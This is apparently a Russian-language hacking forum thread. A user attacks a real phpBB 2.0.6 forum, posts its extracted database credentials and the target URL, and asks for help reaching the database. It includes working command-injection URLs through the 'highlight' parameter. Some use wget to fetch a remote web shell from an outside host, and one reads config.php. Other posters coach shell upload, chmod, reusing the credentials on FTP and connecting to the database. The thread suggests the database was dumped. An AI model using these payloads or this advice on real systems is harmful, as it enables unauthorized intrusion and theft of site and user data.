Привет всем. Тут нашёл форум один, на нём вотчи 2500 человек тусуются.
Но он phpbb 2.0.6
Вытащил информацию(пароль и логин от бд) но в строке адрес бд написано localhost.
Как мне найти где база данных находиться?

Потом ещё хспидером просканил и вот что обнаружилось. Критическая ошибка, ведущая к краху системы.
Как ею воспользоваться мне??

PHP does not perform proper bounds checking on in functions related
to Form-based File Uploads in HTML (RFC1867). Specifically, this
problem occurs in the functions which are used to decode MIME
encoded files. As a result, it may be possible to overrun
the buffer used for the vulnerable functions to cause arbitrary
attacker-supplied instructions to be executed.

Solution:
1. As a workaround, file uploads may be disabled in PHP versions 4.0.3 and later.
2. Upgrade to latest version.

Patch: http://www.php.net/downloads.php

URLs:
http://www.securityfocus.com/bid/4183



Заранее спаисбо.

Вытащил информацию(пароль и логин от бд) но в строке адрес бд написано localhost.
Как мне найти где база данных находиться?

Никак. Локалхост у хостера ;) Причём накой он тебе? У тебя БД

так а как я в дб залезу не знаю её адреса?? у меня вот как:
uid=1010(httpd)
gid=1005(httpd)
groups=1005(httpd)
Linux alvisp 2.4.22 #2 Mon Sep 8 16:52:45 YEKST 2003 i686 unknown
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'forum';
$dbuser = 'vscrk';
$dbpasswd = ''; )\b#i

localhost - это значит что база на том же хосте что и форум

Узнай хост простым пингом.
Пример:
ping forum.antichat.ru
Pinging forum.antichat.ru [81.177.6.78] with 32 bytes of data

81.177.6.78 - вот хост форума

каким образом это мжно сделать?

temon Что именно седелать? Ты про пинг?
Пуск => Выполнить => cmd => А тут по примеру смотри=))

ЗЫ Попробуй логин и пароль от БД к ФТП=) Иногда подходит-))

пинг я уже сделал. А вот адреса фтп тоже не знаю.

ну сделал я пинг, адрес хоста узнал, хотя его и так знал. потом что?
где бд искать?

Адрес фтп тот же что и адрес форума, а к бд через phpMyAmdin конектись.

$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'forum';
$dbuser = 'vscrk';
$dbpasswd = ''; )\b#i

$dbpasswd = ''; )\b#i -неправильный пароль
правильно используй узвимость

$dbpasswd = ''; )\b#i -неправильный пароль
правильно используй узвимостькакой нах неправильный пароль??
Для юзера vscrk его вопще нет.

вот именно. Как не старался пароль вытягивать, видимо база данных без пароля стоит.
Я ТАК думаю что сервак сайта ваще на апаче стоит.



А как подключаться через phpMy Admin ???

Пытаюсь на фтп залазить тоже не получается.
Может можно щелл залить??
v
iewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://xyra.narod.ru/remview.php
viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://xyra.narod.ru/remview.php`.%2527
Вот этими пытаюсь нифига не получается.

Короче вот ссылка на форум.
Только пожалуйста не пакостите там, я хочу сам.
Прошу вас.
Вы только помогите мне бд найти.
http://panda.alvisp.ru/pages/forum/viewtopic.php?p=213&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db

$dbpasswd = '';Это не кавычка,а 2 апострофа=>пароль для юзера пустой.
Подключись к базе,щас много всяких mysql клиентов.
зы настчет phpmyadmin есть уже тема

почитал я туть =)
вот в чём проблема...
правильно начал вроде.
используй &highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ТУТ_КОМАНДА
в том что у тя не получается залить шелл проверь права папки куда ты пытаешься залить... (следовательно если прав не хватает ставь выставь нужные... chmod 755 papka) (поправте если ошибаюсь) заливаешь шелл...

дык... вообще есть ls -la, cd, шо ещё для счастья нужна? =)
дерзай...

по поводу БД... ммм... как уже заметили есть кууучу клиентов для конекта в БД...

бд уже слили кажется :))